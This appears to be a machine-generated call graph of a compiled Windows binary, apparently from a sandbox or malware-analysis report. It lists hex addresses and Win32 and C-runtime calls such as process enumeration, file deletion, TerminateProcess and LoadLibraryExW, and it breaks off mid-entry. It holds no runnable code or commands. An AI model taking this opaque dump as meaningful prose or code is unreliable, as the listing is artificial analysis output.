calls 2 library calls 100881->101379 100882->100704 100884->100704 100885->100704 100886->100704 100888 2f4d4b 100887->100888 100889 2f4d51 100887->100889 100888->100704 100890 32da58 __i64tow 100889->100890 100891 2f4d99 100889->100891 100893 2f4d57 __itow 100889->100893 100896 32d95f 100889->100896 101380 3137fa 83 API calls 3 library calls 100891->101380 100895 310f16 Mailbox 59 API calls 100893->100895 100897 2f4d71 100895->100897 100898 310f16 Mailbox 59 API calls 100896->100898 100900 32d9d7 Mailbox _wcscpy 100896->100900 100897->100888 100899 301a36 59 API calls 100897->100899 100902 32d9a4 100898->100902 100899->100888 101381 3137fa 83 API calls 3 library calls 100900->101381 100901 310f16 Mailbox 59 API calls 100903 32d9ca 100901->100903 100902->100901 100903->100900 100904 301a36 59 API calls 100903->100904 100904->100900 100905->100704 100906->100704 100907->100704 100909 310f16 Mailbox 59 API calls 100908->100909 100910 301228 100909->100910 100911 310f16 Mailbox 59 API calls 100910->100911 100912 301236 100911->100912 100912->100686 100913->100686 100914->100686 100915->100686 100916->100686 100918 36c162 100917->100918 100919 36c148 100917->100919 101382 36a6c5 100918->101382 101409 35a2fa 89 API calls 4 library calls 100919->101409 100923 2f53b0 293 API calls 100924 36c1ce 100923->100924 100925 36c15a Mailbox 100924->100925 100926 36c260 100924->100926 100931 36c20f 100924->100931 100925->100704 100927 36c266 100926->100927 100928 36c2b6 100926->100928 101410 357d42 59 API calls 100927->101410 100928->100925 100929 2f4d37 84 API calls 100928->100929 100932 36c2c8 100929->100932 100934 357707 59 API calls 100931->100934 100935 301aa4 59 API calls 100932->100935 100933 36c289 101411 3035b9 59 API calls Mailbox 100933->101411 100938 36c23f 100934->100938 100936 36c2ec CharUpperBuffW 100935->100936 100941 36c306 100936->100941 100940 346c9f 293 API calls 100938->100940 100939 36c291 Mailbox 100944 2fb020 293 API calls 100939->100944 100940->100925 100942 36c30d 100941->100942 100943 36c359 100941->100943 101389 357707 100942->101389 100945 2f4d37 84 API calls 100943->100945 100944->100925 100946 36c361 100945->100946 101412 2f5376 60 API calls 100946->101412 100951 36c36b 100951->100925 100952 2f4d37 84 API calls 100951->100952 100953 36c386 100952->100953 101413 3035b9 59 API calls Mailbox 100953->101413 100955 36c396 100956 2fb020 293 API calls 100955->100956 100956->100925 100957->100686 100958->100686 100959->100686 101448 354b4f 100960->101448 100962 3540b1 CloseHandle 100962->100686 100963 354002 Process32NextW 100963->100962 100969 353ffb Mailbox 100963->100969 100964 301207 59 API calls 100964->100969 100965 301a36 59 API calls 100965->100969 100966 310044 59 API calls 100966->100969 100969->100962 100969->100963 100969->100964 100969->100965 100969->100966 101454 3017e0 59 API calls Mailbox 100969->101454 101455 30151f 61 API calls 100969->101455 100971 2f35e2 100970->100971 100974 2f35b0 100970->100974 100971->100766 100972 2f35d5 IsDialogMessageW 100972->100971 100972->100974 100973 32d1a3 GetClassLongW 100973->100972 100973->100974 100974->100971 100974->100972 100974->100973 100976 2f53b0 294 API calls 100975->100976 100977 2f951f 100976->100977 100978 331f31 100977->100978 100981 2f9527 _memmove 100977->100981 101011 2f5190 59 API calls Mailbox 100978->101011 100980 2f9944 100989 310f16 Mailbox 59 API calls 100980->100989 100981->100980 100984 2f9583 100981->100984 100986 310f16 59 API calls Mailbox 100981->100986 100992 3321f0 100981->100992 100993 2f96cf 100981->100993 101008 2f9741 100981->101008 100983 33220e 100983->100983 100984->100778 100985 2f986a 100987 2f987f 100985->100987 100988 3321e1 100985->100988 100986->100981 100990 310f16 Mailbox 59 API calls 100987->100990 101016 36a74b 59 API calls 100988->101016 101002 2f96e3 _memmove 100989->101002 101001 2f977d 100990->101001 101017 35a2fa 89 API calls 4 library calls 100992->101017 100993->100980 100995 2f96dc 100993->100995 100994 310f16 Mailbox 59 API calls 100996 2f970e 100994->100996 100998 310f16 Mailbox 59 API calls 100995->100998 100996->101008 101010 2fcca0 294 API calls 100996->101010 100997 3321d0 101015 35a2fa 89 API calls 4 library calls 100997->101015 100998->101002 101001->100778 101002->100994 101002->100996 101002->101008 101004 3321a8 101014 35a2fa 89 API calls 4 library calls 101004->101014 101006 332183 101013 35a2fa 89 API calls 4 library calls 101006->101013 101008->100985 101008->100997 101008->101001 101008->101004 101008->101006 101012 2f8180 294 API calls 101008->101012 101009->100779 101010->101008 101011->100980 101012->101008 101013->101001 101014->101001 101015->101001 101016->100992 101017->100983 101018->100810 101019->100810 101030 312da4 101020->101030 101022 312eab 101022->100795 101023->100810 101024->100810 101025->100810 101026->100810 101027->100802 101028->100810 101029->100810 101031 312db0 __ioinit 101030->101031 101038 313379 101031->101038 101037 312dd7 __ioinit 101037->101022 101055 319d6b 101038->101055 101040 312db9 101041 312de8 DecodePointer DecodePointer 101040->101041 101042 312e15 101041->101042 101043 312dc5 101041->101043 101042->101043 101101 318904 59 API calls __wopenfile 101042->101101 101052 312de2 101043->101052 101045 312e78 EncodePointer EncodePointer 101045->101043 101046 312e4c 101046->101043 101051 312e66 EncodePointer 101046->101051 101103 3189c4 61 API calls 2 library calls 101046->101103 101047 312e27 101047->101045 101047->101046 101102 3189c4 61 API calls 2 library calls 101047->101102 101050 312e60 101050->101043 101050->101051 101051->101045 101104 313382 101052->101104 101056 319d7c 101055->101056 101057 319d8f EnterCriticalSection 101055->101057 101062 319df3 101056->101062 101057->101040 101059 319d82 101059->101057 101086 313217 58 API calls 3 library calls 101059->101086 101063 319dff __ioinit 101062->101063 101064 319e20 101063->101064 101065 319e08 101063->101065 101073 319e41 __ioinit 101064->101073 101090 31897d 58 API calls 2 library calls 101064->101090 101087 31a2cb 58 API calls 2 library calls 101065->101087 101067 319e0d 101088 31a328 58 API calls 8 library calls 101067->101088 101069 319e35 101071 319e4b 101069->101071 101072 319e3c 101069->101072 101076 319d6b __lock 58 API calls 101071->101076 101091 318c88 58 API calls __getptd_noexit 101072->101091 101073->101059 101074 319e14 101089 313201 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101074->101089 101078 319e52 101076->101078 101080 319e77 101078->101080 101081 319e5f 101078->101081 101093 312eb5 101080->101093 101092 319f8b InitializeCriticalSectionAndSpinCount 101081->101092 101084 319e6b 101099 319e93 LeaveCriticalSection _doexit 101084->101099 101087->101067 101088->101074 101090->101069 101091->101073 101092->101084 101094 312ebe RtlFreeHeap 101093->101094 101098 312ee7 __dosmaperr 101093->101098 101095 312ed3 101094->101095 101094->101098 101100 318c88 58 API calls __getptd_noexit 101095->101100 101097 312ed9 GetLastError 101097->101098 101098->101084 101099->101073 101100->101097 101101->101047 101102->101046 101103->101050 101107 319ed5 LeaveCriticalSection 101104->101107 101106 312de7 101106->101037 101107->101106 101108->100821 101109->100814 101110->100821 101111->100825 101112->100821 101114 2f4d37 84 API calls 101113->101114 101115 36cfcb 101114->101115 101139 36d012 Mailbox 101115->101139 101151 36dc56 101115->101151 101117 36d26a 101118 36d3df 101117->101118 101122 36d278 101117->101122 101202 36dd79 92 API calls Mailbox 101118->101202 101121 36d3ee 101121->101122 101124 36d3fa 101121->101124 101164 36ce1f 101122->101164 101123 2f4d37 84 API calls 101141 36d063 Mailbox 101123->101141 101124->101139 101129 36d2b1 101179 310d68 101129->101179 101132 36d2e4 101187 2f47be 101132->101187 101133 36d2cb 101186 35a2fa 89 API calls 4 library calls 101133->101186 101136 36d2d6 GetCurrentProcess TerminateProcess 101136->101132 101139->100830 101141->101117 101141->101123 101141->101139 101184 350267 59 API calls 2 library calls 101141->101184 101185 36d490 61 API calls 2 library calls 101141->101185 101143 36d455 101143->101139 101147 36d469 FreeLibrary 101143->101147 101144 36d31c 101199 36dafa 107 API calls _free 101144->101199 101147->101139 101149 36d32d 101149->101143 101200 2f4230 59 API calls Mailbox 101149->101200 101201 2f523c 59 API calls 101149->101201 101203 36dafa 107 API calls _free 101149->101203 101152 301aa4 59 API calls 101151->101152 101153 36dc71 CharLowerBuffW 101152->101153 101204 34f6e6 101153->101204 101157 301207 59 API calls 101158 36dcaa 101157->101158 101211 301462 101158->101211 101160 36dd09 Mailbox 101160->101141 101161 36dcc1 101224 301981 101161->101224 101163 36dccd Mailbox 101163->101160 101228 36d490 61 API calls 2 library calls 101163->101228 101165 36ce3a 101164->101165 101166 36ce8f 101164->101166 101167 310f16 Mailbox 59 API calls 101165->101167 101170 36df01 101166->101170 101169 36ce5c 101167->101169 101168 310f16 Mailbox 59 API calls 101168->101169 101169->101166 101169->101168 101171 36e12a Mailbox 101170->101171 101178 36df24 _strcat _wcscpy __wsetenvp 101170->101178 101171->101129 101172 2f502b 59 API calls 101172->101178 101173 2f5087 59 API calls 101173->101178 101174 2f50d5 59 API calls 101174->101178 101175 2f4d37 84 API calls 101175->101178 101176 31586c 58 API calls _W_store_winword 101176->101178 101178->101171 101178->101172 101178->101173 101178->101174 101178->101175 101178->101176 101235 355caf 61 API calls 2 library calls 101178->101235 101181 310d7d 101179->101181 101180 310e15 CreateToolhelp32Snapshot 101183 310de3 101180->101183 101181->101180 101182 310e03 CloseHandle 101181->101182 101181->101183 101182->101183 101183->101132 101183->101133 101184->101141 101185->101141 101186->101136 101188 2f47c6 101187->101188 101189 310f16 Mailbox 59 API calls 101188->101189 101190 2f47d4 101189->101190 101191 2f47e0 101190->101191 101236 2f46ec 59 API calls Mailbox 101190->101236 101193 2f4540 101191->101193 101237 2f4650 101193->101237 101195 2f454f 101196 310f16 Mailbox 59 API calls 101195->101196 101197 2f45eb 101195->101197 101196->101197 101197->101149 101198 2f4230 59 API calls Mailbox 101197->101198 101198->101144 101199->101149 101200->101149 101201->101149 101202->101121 101203->101149 101205 34f711 __wsetenvp 101204->101205 101206 34f750 101205->101206 101209 34f746 101205->101209 101210 34f7f7 101205->101210 101206->101157 101206->101163 101209->101206 101229 3014db 61 API calls 101209->101229 101210->101206 101230 3014db 61 API calls 101210->101230 101212 301471 101211->101212 101213 3014ce 101211->101213 101212->101213 101215 30147c 101212->101215 101214 301981 59 API calls 101213->101214 101221 30149f _memmove 101214->101221 101216 301497 101215->101216 101217 33f15e 101215->101217 101231 301b7c 59 API calls Mailbox 101216->101231 101232 301c7e 101217->101232 101220 33f168 101222 310f16 Mailbox 59 API calls 101220->101222 101221->101161 101223 33f188 101222->101223 101225 301998 _memmove 101224->101225 101226 30198f 101224->101226 101225->101163 101226->101225 101227 301aa4 59 API calls 101226->101227 101227->101225 101228->101160 101229->101209 101230->101210 101231->101221 101233 310f16 Mailbox 59 API calls 101232->101233 101234 301c88 101233->101234 101234->101220 101235->101178 101236->101191 101238 2f4659 Mailbox 101237->101238 101239 32d61c 101238->101239 101244 2f4663 101238->101244 101240 310f16 Mailbox 59 API calls 101239->101240 101242 32d628 101240->101242 101241 2f466a 101241->101195 101244->101241 101245 2f5190 59 API calls Mailbox 101244->101245 101245->101244 101246->100844 101247->100846 101248->100852 101250 2f5041 101249->101250 101251 2f503c 101249->101251 101250->100855 101251->101250 101253 3136ec 59 API calls 101251->101253 101253->101250 101255 301207 59 API calls 101254->101255 101256 353e91 101255->101256 101257 301207 59 API calls 101256->101257 101258 353e9a 101257->101258 101259 301207 59 API calls 101258->101259 101260 353ea3 101259->101260 101279 3101af 101260->101279 101265 353ec9 101291 310044 101265->101291 101268 353edd FindFirstFileW 101269 353efc 101268->101269 101270 353f69 FindClose 101268->101270 101269->101270 101273 353f00 101269->101273 101275 353f74 Mailbox 101270->101275 101271 353f44 FindNextFileW 101271->101269 101271->101273 101272 301c9c 59 API calls 101272->101273 101273->101269 101273->101271 101273->101272 101276 301900 59 API calls 101273->101276 101349 3017e0 59 API calls Mailbox 101273->101349 101275->100866 101277 353f35 DeleteFileW 101276->101277 101277->101271 101278 353f60 FindClose 101277->101278 101278->101275 101350 321aa0 101279->101350 101282 3101f8 101365 3019e1 101282->101365 101283 3101db 101356 301821 101283->101356 101286 3101e7 101352 30133d 101286->101352 101289 354e59 GetFileAttributesW 101290 353eb7 101289->101290 101290->101265 101342 301900 101290->101342 101292 301207 59 API calls 101291->101292 101293 31005a 101292->101293 101294 301207 59 API calls 101293->101294 101295 310062 101294->101295 101296 301207 59 API calls 101295->101296 101297 31006a 101296->101297 101298 301207 59 API calls 101297->101298 101299 310072 101298->101299 101300 346062 101299->101300 101301 3100a6 101299->101301 101302 301c9c 59 API calls 101300->101302 101303 301462 59 API calls 101301->101303 101304 34606b 101302->101304 101305 3100b4 101303->101305 101306 3019e1 59 API calls 101304->101306 101307 301981 59 API calls 101305->101307 101309 3100e9 101306->101309 101308 3100be 101307->101308 101308->101309 101310 301462 59 API calls 101308->101310 101311 310129 101309->101311 101313 310108 101309->101313 101324 34608b 101309->101324 101314 3100df 101310->101314 101312 301462 59 API calls 101311->101312 101315 31013a 101312->101315 101370 301609 101313->101370 101317 301981 59 API calls 101314->101317 101319 31014c 101315->101319 101322 301c9c 59 API calls 101315->101322 101316 34615b 101320 301821 59 API calls 101316->101320 101317->101309 101323 31015c 101319->101323 101326 301c9c 59 API calls 101319->101326 101337 346118 101320->101337 101322->101319 101328 310163 101323->101328 101329 301c9c 59 API calls 101323->101329 101324->101316 101327 346144 101324->101327 101336 3460c2 101324->101336 101325 301462 59 API calls 101325->101311 101326->101323 101327->101316 101332 34612f 101327->101332 101330 301c9c 59 API calls 101328->101330 101339 31016a Mailbox 101328->101339 101329->101328 101330->101339 101331 301609 59 API calls 101331->101337 101334 301821 59 API calls 101332->101334 101333 346120 101335 301821 59 API calls 101333->101335 101334->101337 101335->101337 101336->101333 101340 34610b 101336->101340 101337->101311 101337->101331 101373 30153b 59 API calls 2 library calls 101337->101373 101339->101268 101341 301821 59 API calls 101340->101341 101341->101337 101343 301914 101342->101343 101344 33f4b4 101342->101344 101374 3018a5 101343->101374 101345 301c7e 59 API calls 101344->101345 101347 33f4bf __wsetenvp _memmove 101345->101347 101348 30191f 101348->101265 101349->101273 101351 3101bc GetFullPathNameW 101350->101351 101351->101282 101351->101283 101353 30134b 101352->101353 101354 301981 59 API calls 101353->101354 101355 30135b 101354->101355 101355->101289 101357 30189a 101356->101357 101358 30182d __wsetenvp 101356->101358 101359 301981 59 API calls 101357->101359 101360 301843 101358->101360 101361 301868 101358->101361 101364 30184b _memmove 101359->101364 101369 301b7c 59 API calls Mailbox 101360->101369 101363 301c7e 59 API calls 101361->101363 101363->101364 101364->101286 101366 3019fb 101365->101366 101367 3019ee 101365->101367 101368 310f16 Mailbox 59 API calls 101366->101368 101367->101286 101368->101367 101369->101364 101371 301aa4 59 API calls 101370->101371 101372 301614 101371->101372 101372->101311 101372->101325 101373->101337 101375 3018b4 __wsetenvp 101374->101375 101376 3018c5 _memmove 101375->101376 101377 301c7e 59 API calls 101375->101377 101376->101348 101378 33f471 _memmove 101377->101378 101379->100882 101380->100893 101381->100890 101383 36a6e0 101382->101383 101384 36a738 101382->101384 101385 310f16 Mailbox 59 API calls 101383->101385 101384->100923 101388 36a702 101385->101388 101386 310f16 Mailbox 59 API calls 101386->101388 101388->101384 101388->101386 101414 346f3e 59 API calls Mailbox 101388->101414 101390 357719 101389->101390 101392 357750 101389->101392 101391 310f16 Mailbox 59 API calls 101390->101391 101390->101392 101391->101392 101393 346c9f 101392->101393 101394 346ce9 101393->101394 101398 346cff Mailbox 101393->101398 101395 301a36 59 API calls 101394->101395 101395->101398 101396 346d3d 101400 2fa820 294 API calls 101396->101400 101397 346d2a 101399 36c11d 294 API calls 101397->101399 101398->101396 101398->101397 101405 346d36 101399->101405 101403 346d74 101400->101403 101402 346de5 101402->100925 101404 346dbf 101403->101404 101403->101405 101407 346da4 101403->101407 101404->101405 101421 35a2fa 89 API calls 4 library calls 101404->101421 101422 346ad4 59 API calls Mailbox 101405->101422 101415 346e50 101407->101415 101409->100925 101410->100933 101411->100939 101412->100951 101413->100955 101414->101388 101416 346e68 101415->101416 101423 36473f 101416->101423 101432 36ef7a 101416->101432 101437 353fa7 101416->101437 101417 346ebc 101417->101405 101421->101405 101422->101402 101424 310f16 Mailbox 59 API calls 101423->101424 101425 364750 101424->101425 101440 30433f 101425->101440 101428 2f4d37 84 API calls 101429 364771 GetEnvironmentVariableW 101428->101429 101443 3578be 59 API calls Mailbox 101429->101443 101431 36478e 101431->101417 101433 2f4d37 84 API calls 101432->101433 101434 36ef97 101433->101434 101435 353fb5 66 API calls 101434->101435 101436 36efa6 101435->101436 101436->101417 101444 3547b7 GetFileAttributesW 101437->101444 101441 310f16 Mailbox 59 API calls 101440->101441 101442 304351 101441->101442 101442->101428 101443->101431 101445 353fac 101444->101445 101446 3547d2 FindFirstFileW 101444->101446 101445->101417 101446->101445 101447 3547e7 FindClose 101446->101447 101447->101445 101449 354b76 101448->101449 101453 354b5d 101448->101453 101457 3136f5 59 API calls __wcstoi64 101449->101457 101452 354b7c 101452->100969 101453->101449 101453->101452 101456 31378e GetStringTypeW _iswctype 101453->101456 101454->100969 101455->100969 101456->101453 101457->101452 101458->100750 101459->100750 101460->100738 101461->100747 101462->100751 101463->100747 101464->100747 101465->100754 101466 317db3 101467 317dbf __ioinit 101466->101467 101503 319f68 GetStartupInfoW 101467->101503 101469 317dc4 101505 318cdc GetProcessHeap 101469->101505 101471 317e1c 101472 317e27 101471->101472 101588 317f03 58 API calls 3 library calls 101471->101588 101506 319c46 101472->101506 101475 317e2d 101476 317e38 __RTC_Initialize 101475->101476 101589 317f03 58 API calls 3 library calls 101475->101589 101527 31d732 101476->101527 101479 317e53 GetCommandLineW 101546 325083 GetEnvironmentStringsW 101479->101546 101480 317e47 101480->101479 101590 317f03 58 API calls 3 library calls 101480->101590 101484 317e52 101484->101479 101486 317e6d 101487 317e78 101486->101487 101591 313217 58 API calls 3 library calls 101486->101591 101556 324eb8 101487->101556 101490 317e7e 101491 317e89 101490->101491 101592 313217 58 API calls 3 library calls 101490->101592 101570 313251 101491->101570 101494 317e91 101495 317e9c __wwincmdln 101494->101495 101593 313217 58 API calls 3 library calls 101494->101593 101576 305f8b 101495->101576 101498 317eb0 101499 317ebf 101498->101499 101594 3134ba 58 API calls _doexit 101498->101594 101595 313242 58 API calls _doexit 101499->101595 101502 317ec4 __ioinit 101504 319f7e 101503->101504 101504->101469 101505->101471 101596 3132e9 36 API calls 2 library calls 101506->101596 101508 319c4b 101597 319e9c InitializeCriticalSectionAndSpinCount __ioinit 101508->101597 101510 319c50 101511 319c54 101510->101511 101599 319eea TlsAlloc 101510->101599 101598 319cbc 61 API calls 2 library calls 101511->101598 101514 319c59 101514->101475 101515 319c66 101515->101511 101516 319c71 101515->101516 101600 318935 101516->101600 101519 319cb3 101608 319cbc 61 API calls 2 library calls 101519->101608 101522 319c92 101522->101519 101524 319c98 101522->101524 101523 319cb8 101523->101475 101607 319b93 58 API calls 4 library calls 101524->101607 101526 319ca0 GetCurrentThreadId 101526->101475 101528 31d73e __ioinit 101527->101528 101529 319d6b __lock 58 API calls 101528->101529 101530 31d745 101529->101530 101531 318935 __calloc_crt 58 API calls 101530->101531 101533 31d756 101531->101533 101532 31d7c1 GetStartupInfoW 101535 31d905 101532->101535 101537 31d7d6 101532->101537 101533->101532 101534 31d761 __ioinit @_EH4_CallFilterFunc@8 101533->101534 101534->101480 101536 31d9cd 101535->101536 101540 31d952 GetStdHandle 101535->101540 101541 31d965 GetFileType 101535->101541 101621 319f8b InitializeCriticalSectionAndSpinCount 101535->101621 101622 31d9dd LeaveCriticalSection _doexit 101536->101622 101537->101535 101539 318935 __calloc_crt 58 API calls 101537->101539 101542 31d824 101537->101542 101539->101537 101540->101535 101541->101535 101542->101535 101543 31d858 GetFileType 101542->101543 101620 319f8b InitializeCriticalSectionAndSpinCount 101542->101620 101543->101542 101547 317e63 101546->101547 101548 325094 101546->101548 101552 324c7b GetModuleFileNameW 101547->101552 101623 31897d 58 API calls 2 library calls 101548->101623 101550 3250ba _memmove 101551 3250d0 FreeEnvironmentStringsW 101550->101551 101551->101547 101554 324caf _wparse_cmdline 101552->101554 101553 324cef _wparse_cmdline 101553->101486 101554->101553 101624 31897d 58 API calls 2 library calls 101554->101624 101557 324ed1 __wsetenvp 101556->101557 101561 324ec9 101556->101561 101558 318935 __calloc_crt 58 API calls 101557->101558 101566 324efa __wsetenvp 101558->101566 101559 324f51 101560 312eb5 _free 58 API calls 101559->101560 101560->101561 101561->101490 101562 318935 __calloc_crt 58 API calls 101562->101566 101563 324f76 101565 312eb5 _free 58 API calls 101563->101565 101565->101561 101566->101559 101566->101561 101566->101562 101566->101563 101567 324f8d 101566->101567 101625 324767 58 API calls __wopenfile 101566->101625 101626 318f26 IsProcessorFeaturePresent 101567->101626 101569 324f99 101569->101490 101571 31325d __IsNonwritableInCurrentImage 101570->101571 101649 31a631 101571->101649 101573 31327b __initterm_e 101574 312ea0 __cinit 67 API calls 101573->101574 101575 31329a _doexit __IsNonwritableInCurrentImage 101573->101575 101574->101575 101575->101494 101577 305fa5 101576->101577 101578 306044 101576->101578 101579 305fdf IsThemeActive 101577->101579 101578->101498 101652 3134ce 101579->101652 101583 30600b 101664 305f00 SystemParametersInfoW SystemParametersInfoW 101583->101664 101585 306017 101665 305240 101585->101665 101587 30601f SystemParametersInfoW 101587->101578 101588->101472 101589->101476 101590->101484 101594->101499 101595->101502 101596->101508 101597->101510 101598->101514 101599->101515 101602 31893c 101600->101602 101603 318977 101602->101603 101604 31895a 101602->101604 101609 325356 101602->101609 101603->101519 101606 319f46 TlsSetValue 101603->101606 101604->101602 101604->101603 101617 31a292 Sleep 101604->101617 101606->101522 101607->101526 101608->101523 101610 325361 101609->101610 101615 32537c 101609->101615 101611 32536d 101610->101611 101610->101615 101618 318c88 58 API calls __getptd_noexit 101611->101618 101613 32538c HeapAlloc 101614 325372 101613->101614 101613->101615 101614->101602 101615->101613 101615->101614 101619 313503 DecodePointer 101615->101619 101617->101604 101618->101614 101619->101615 101620->101542 101621->101535 101622->101534 101623->101550 101624->101553 101625->101566 101627 318f31 101626->101627 101632 318db9 101627->101632 101631 318f4c 101631->101569 101633 318dd3 _memset __call_reportfault 101632->101633 101634 318df3 IsDebuggerPresent 101633->101634 101640 31a2b5 SetUnhandledExceptionFilter UnhandledExceptionFilter 101634->101640 101637 318eb7 __call_reportfault 101641 31c756 101637->101641 101638 318eda 101639 31a2a0 GetCurrentProcess TerminateProcess 101638->101639 101639->101631 101640->101637 101642 31c760 IsProcessorFeaturePresent 101641->101642 101643 31c75e 101641->101643 101645 325a6a 101642->101645 101643->101638 101648 325a19 5 API calls 2 library calls 101645->101648 101647 325b4d 101647->101638 101648->101647 101650 31a634 EncodePointer 101649->101650 101650->101650 101651 31a64e 101650->101651 101651->101573 101653 319d6b __lock 58 API calls 101652->101653 101654 3134d9 DecodePointer EncodePointer 101653->101654 101717 319ed5 LeaveCriticalSection 101654->101717 101656 306004 101657 313536 101656->101657 101658 313540 101657->101658 101659 31355a 101657->101659 101658->101659 101718 318c88 58 API calls __getptd_noexit 101658->101718 101659->101583 101661 31354a 101719 318f16 9 API calls __wopenfile 101661->101719 101663 313555 101663->101583 101664->101585 101666 30524d __ftell_nolock 101665->101666 101667 301207 59 API calls 101666->101667 101668 305258 GetCurrentDirectoryW 101667->101668 101720 304ec8 101668->101720 101670 30527e IsDebuggerPresent 101671 340aa1 MessageBoxA 101670->101671 101672 30528c 101670->101672 101674 340ab9 101671->101674 101673 3052a0 101672->101673 101672->101674 101788 3031bf 101673->101788 101843 30314d 59 API calls Mailbox 101674->101843 101678 305358 101679 3052be GetFullPathNameW 101682 340ac9 101685 340adf SetCurrentDirectoryW 101682->101685 101684 30536c Mailbox 101684->101587 101685->101684 101717->101656 101718->101661 101719->101663 101721 301207 59 API calls 101720->101721 101722 304ede 101721->101722 101853 305420 101722->101853 101724 304efc 101725 3019e1 59 API calls 101724->101725 101726 304f10 101725->101726 101727 301c9c 59 API calls 101726->101727 101728 304f1b 101727->101728 101867 2f477a 101728->101867 101731 301a36 59 API calls 101732 304f34 101731->101732 101733 2f39be 68 API calls 101732->101733 101734 304f44 Mailbox 101733->101734 101735 301a36 59 API calls 101734->101735 101736 304f68 101735->101736 101737 2f39be 68 API calls 101736->101737 101738 304f77 Mailbox 101737->101738 101739 301207 59 API calls 101738->101739 101740 304f94 101739->101740 101870 3055bc 101740->101870 101744 304fae 101745 3409d4 101744->101745 101746 304fb8 101744->101746 101747 3055bc 59 API calls 101745->101747 101748 31305f _W_store_winword 60 API calls 101746->101748 101749 3409e8 101747->101749 101750 304fc3 101748->101750 101752 3055bc 59 API calls 101749->101752 101750->101749 101751 304fcd 101750->101751 101753 31305f _W_store_winword 60 API calls 101751->101753 101754 340a04 101752->101754 101755 304fd8 101753->101755 101757 30fffa 61 API calls 101754->101757 101755->101754 101756 304fe2 101755->101756 101758 31305f _W_store_winword 60 API calls 101756->101758 101759 340a27 101757->101759 101760 304fed 101758->101760 101761 3055bc 59 API calls 101759->101761 101762 304ff7 101760->101762 101763 340a50 101760->101763 101765 340a33 101761->101765 101766 30501b 101762->101766 101769 301c9c 59 API calls 101762->101769 101764 3055bc 59 API calls 101763->101764 101767 340a6e 101764->101767 101768 301c9c 59 API calls 101765->101768 101770 2f47be 59 API calls 101766->101770 101771 301c9c 59 API calls 101767->101771 101772 340a41 101768->101772 101773 30500e 101769->101773 101775 30502a 101770->101775 101776 340a7c 101771->101776 101777 3055bc 59 API calls 101772->101777 101774 3055bc 59 API calls 101773->101774 101774->101766 101778 2f4540 59 API calls 101775->101778 101779 3055bc 59 API calls 101776->101779 101777->101763 101780 305038 101778->101780 101781 340a8b 101779->101781 101886 2f43d0 101780->101886 101781->101781 101783 2f477a 59 API calls 101785 305055 101783->101785 101784 2f43d0 59 API calls 101784->101785 101785->101783 101785->101784 101786 3055bc 59 API calls 101785->101786 101787 30509b Mailbox 101785->101787 101786->101785 101787->101670 101789 3031cc __ftell_nolock 101788->101789 101790 340294 _memset 101789->101790 101791 3031e5 101789->101791 101793 3402b0 GetOpenFileNameW 101790->101793 101792 3101af 60 API calls 101791->101792 101794 3031ee 101792->101794 101795 3402ff 101793->101795 101906 3108f0 101794->101906 101797 301821 59 API calls 101795->101797 101799 340314 101797->101799 101799->101799 101801 303203 101924 30278a 101801->101924 101843->101682 101854 30542d __ftell_nolock 101853->101854 101855 301821 59 API calls 101854->101855 101860 305590 Mailbox 101854->101860 101857 30545f 101855->101857 101856 301609 59 API calls 101856->101857 101857->101856 101866 305495 Mailbox 101857->101866 101858 301609 59 API calls 101858->101866 101859 305563 101859->101860 101861 301a36 59 API calls 101859->101861 101860->101724 101862 305584 101861->101862 101864 304c94 59 API calls 101862->101864 101863 301a36 59 API calls 101863->101866 101864->101860 101866->101858 101866->101859 101866->101860 101866->101863 101895 304c94 101866->101895 101868 310f16 Mailbox 59 API calls 101867->101868 101869 2f4787 101868->101869 101869->101731 101871 3055c6 101870->101871 101872 3055df 101870->101872 101874 301c9c 59 API calls 101871->101874 101873 301821 59 API calls 101872->101873 101875 304fa0 101873->101875 101874->101875 101876 31305f 101875->101876 101877 3130e0 101876->101877 101878 31306b 101876->101878 101903 3130f2 60 API calls 3 library calls 101877->101903 101885 313090 101878->101885 101901 318c88 58 API calls __getptd_noexit 101878->101901 101881 3130ed 101881->101744 101882 313077 101902 318f16 9 API calls __wopenfile 101882->101902 101884 313082 101884->101744 101885->101744 101887 32d5f9 101886->101887 101892 2f43e7 101886->101892 101887->101892 101905 2f40cb 59 API calls Mailbox 101887->101905 101889 2f44e8 101893 310f16 Mailbox 59 API calls 101889->101893 101890 2f4530 101904 2f523c 59 API calls 101890->101904 101892->101889 101892->101890 101894 2f44ef 101892->101894 101893->101894 101894->101785 101896 304ca2 101895->101896 101900 304cc4 _memmove 101895->101900 101898 310f16 Mailbox 59 API calls 101896->101898 101897 310f16 Mailbox 59 API calls 101899 304cd8 101897->101899 101898->101900 101899->101866 101900->101897 101901->101882 101902->101884 101903->101881 101904->101894 101905->101892 101907 321aa0 __ftell_nolock 101906->101907 101908 3108fd GetLongPathNameW 101907->101908 101909 301821 59 API calls 101908->101909 101910 3031f7 101909->101910 101911 302f3d 101910->101911 101912 301207 59 API calls 101911->101912 101913 302f4f 101912->101913 101914 3101af 60 API calls 101913->101914 101915 302f5a 101914->101915 101916 302f65 101915->101916 101920 3400f7 101915->101920 101918 304c94 59 API calls 101916->101918 101919 302f71 101918->101919 101958 2f1307 101919->101958 101922 340111 101920->101922 101964 30151f 61 API calls 101920->101964 101923 302f84 Mailbox 101923->101801 101965 3049c2 101924->101965 101927 33f856 102081 359983 101927->102081 101928 3049c2 136 API calls 101930 3027c3 101928->101930 101930->101927 101932 3027cb 101930->101932 101936 33f873 101932->101936 101937 3027d7 101932->101937 101933 33f86b 102139 304a2f 101933->102139 101934 33f888 101935 310f16 Mailbox 59 API calls 101934->101935 101957 33f8cd Mailbox 101935->101957 102145 354655 90 API calls _wprintf 101936->102145 101989 3029be 101937->101989 101942 33f881 101942->101934 101943 33fa81 101944 312eb5 _free 58 API calls 101943->101944 101945 33fa89 101944->101945 101946 304a2f 84 API calls 101945->101946 101951 33fa92 101946->101951 101950 312eb5 _free 58 API calls 101950->101951 101951->101950 101952 304a2f 84 API calls 101951->101952 102147 34fd3f 89 API calls 4 library calls 101951->102147 101952->101951 101954 301a36 59 API calls 101954->101957 101957->101943 101957->101951 101957->101954 102116 34fcdb 101957->102116 102119 3577a7 101957->102119 102125 30343f 101957->102125 102133 303297 101957->102133 102146 34fbfc 61 API calls 2 library calls 101957->102146 101959 2f1319 101958->101959 101963 2f1338 _memmove 101958->101963 101961 310f16 Mailbox 59 API calls 101959->101961 101960 310f16 Mailbox 59 API calls 101962 2f134f 101960->101962 101961->101963 101962->101923 101963->101960 101964->101920 102148 304b29 101965->102148 101970 3049ed LoadLibraryExW 102158 304ade 101970->102158 101971 34083b 101973 304a2f 84 API calls 101971->101973 101975 